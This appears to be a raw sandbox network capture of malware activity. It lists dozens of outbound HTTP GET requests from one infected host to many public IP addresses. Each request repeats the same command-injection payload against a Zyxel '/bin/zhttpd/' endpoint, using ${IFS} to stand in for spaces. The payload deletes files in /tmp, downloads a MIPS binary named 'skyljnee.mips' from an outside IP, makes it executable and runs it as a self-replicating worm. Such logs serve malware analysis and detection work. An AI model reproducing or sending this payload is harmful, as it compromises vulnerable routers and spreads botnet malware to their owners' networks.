                                                Jan 28, 2024 10:16:22.763555050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3617192.168.2.2338304207.37.14.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763605118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3618192.168.2.2344622186.100.237.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763606071 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3619192.168.2.23489742.56.0.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763641119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3620192.168.2.233560674.113.65.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763667107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3621192.168.2.2336130166.31.157.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763715982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3622192.168.2.235095649.11.203.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763724089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3623192.168.2.233436874.136.3.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763755083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3624192.168.2.23546042.195.44.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763760090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3625192.168.2.2336422118.47.238.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763794899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3626192.168.2.2351484202.23.0.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763817072 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3627192.168.2.233854442.38.47.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763824940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3628192.168.2.233443061.111.121.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763878107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3629192.168.2.235055489.33.177.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763896942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3630192.168.2.235557646.246.215.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763942003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3631192.168.2.2340928180.23.19.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.763972044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3632192.168.2.234934067.238.162.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764007092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3633192.168.2.233674053.162.86.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764041901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3634192.168.2.2337488208.103.250.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764064074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3635192.168.2.235248652.213.43.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764091015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3636192.168.2.2358256111.144.242.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764122963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3637192.168.2.2334696221.151.68.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764153957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3638192.168.2.2356910134.52.149.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764178038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3639192.168.2.2335210103.149.103.60443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764198065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3640192.168.2.235728453.60.93.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764242887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3641192.168.2.2337886142.99.201.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764249086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3642192.168.2.2339024145.173.107.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764311075 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3643192.168.2.2355510218.38.169.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764323950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3644192.168.2.2344132149.83.135.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764338970 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3645192.168.2.2345278179.115.158.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764374018 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3646192.168.2.2356176208.62.122.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764400005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3647192.168.2.2336388126.17.188.142443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764442921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3648192.168.2.2335988118.255.209.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764473915 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3649192.168.2.2360780158.242.73.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764513969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3650192.168.2.2353310161.44.0.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764528036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3651192.168.2.233704438.89.208.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764539957 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3652192.168.2.2352470103.213.229.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764604092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3653192.168.2.235208864.65.112.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764616013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3654192.168.2.2350758170.176.220.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764638901 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3655192.168.2.234512635.183.52.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764673948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3656192.168.2.2342510106.242.101.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764729023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3657192.168.2.235025638.213.129.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764748096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3658192.168.2.2347570199.154.119.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764780998 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3659192.168.2.235621427.91.28.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764794111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3660192.168.2.2360034208.154.20.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764812946 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3661192.168.2.2333060188.250.4.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764834881 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3662192.168.2.234693623.142.194.227443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764884949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3663192.168.2.2350538124.67.204.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764909029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3664192.168.2.2335414104.103.235.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764949083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3665192.168.2.234273296.10.91.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764949083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3666192.168.2.233821473.21.64.95443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.764997005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3667192.168.2.235171832.181.248.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765023947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3668192.168.2.2354660104.139.33.86443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765048027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3669192.168.2.233848644.91.249.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765072107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3670192.168.2.2339528115.101.48.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765104055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3671192.168.2.2345476205.216.173.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765105963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3672192.168.2.233864878.216.229.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765130043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3673192.168.2.23390429.53.48.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765175104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3674192.168.2.235526866.253.13.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765208006 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3675192.168.2.235531259.16.206.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765213966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3676192.168.2.233955451.20.230.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765232086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3677192.168.2.234801047.3.37.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:22.765295029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3678192.168.2.2337630122.85.95.54443
                                                TimestampBytes transferredDirectionData
